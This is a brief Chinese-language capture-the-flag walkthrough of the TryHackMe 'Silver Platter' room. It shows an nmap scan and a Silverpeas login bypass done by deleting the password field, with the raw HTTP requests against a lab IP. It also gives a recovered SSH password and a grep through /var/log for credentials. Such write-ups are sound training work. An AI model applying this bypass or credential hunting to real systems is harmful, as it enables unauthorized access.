TryHackMe-Smol

TryHackMe-Silver Platter

nmap -sCV -T4 --min-rate=1000 -O -oN scan bricks.thm

发现80和8080端口

8080端口扫描发现跳转

80端口concat路由发现scr1ptkiddy

结合题目名称，在网上搜到一个cms，

参考这个链接进行身份验证绕过，因为我们已经有一个用户名了，所以我们可以尝试无密码登陆

https://gist.github.com/ChrisPritchard/4b6d5c70d9329ef116266a6c238dcb2d

删除密码字段后成功登陆

GET /silverpeas/look/jsp/MainFrame.jsp HTTP/1.1
Host: 10.10.30.137:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Origin: http://10.10.30.137:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.30.137:8080/silverpeas/defaultLogin.jsp
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=MN15-Arz65wRi7uDwpSHGRL_9vLhkX8EW-_FQy5G.ebabc79c6d2a
Connection: close

后面发包后会进入

然后发现会有其他用户我们利用前面的方式重复如此

登录到了Manager

POST /silverpeas/AuthenticationServlet HTTP/1.1
Host: 10.10.30.137:8080
Content-Length: 80
Cache-Control: max-age=0
Origin: http://10.10.30.137:8080
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.30.137:8080/silverpeas/defaultLogin.jsp
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=hed0KKhg3UMCBSuHov93Gzso9XCrhHfKJGM7TiNy.ebabc79c6d2a; Silverpeas_Directory_Help=IKnowIt
Connection: close

Login=Manager&DomainId=0&X-STKN=MTE3MzQ2YWEtMzNhZC00MGU3LWIzZDMtOGJkYTE5YTI2N2Q2

拿到ssh连接密码

cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol

ssh连上去

第一个flag

发现home目录下有一个tyler用户，尝试切换发现去找

grep -Ri 'password' /var/log 2>/dev/null

_Zd_zx7N823/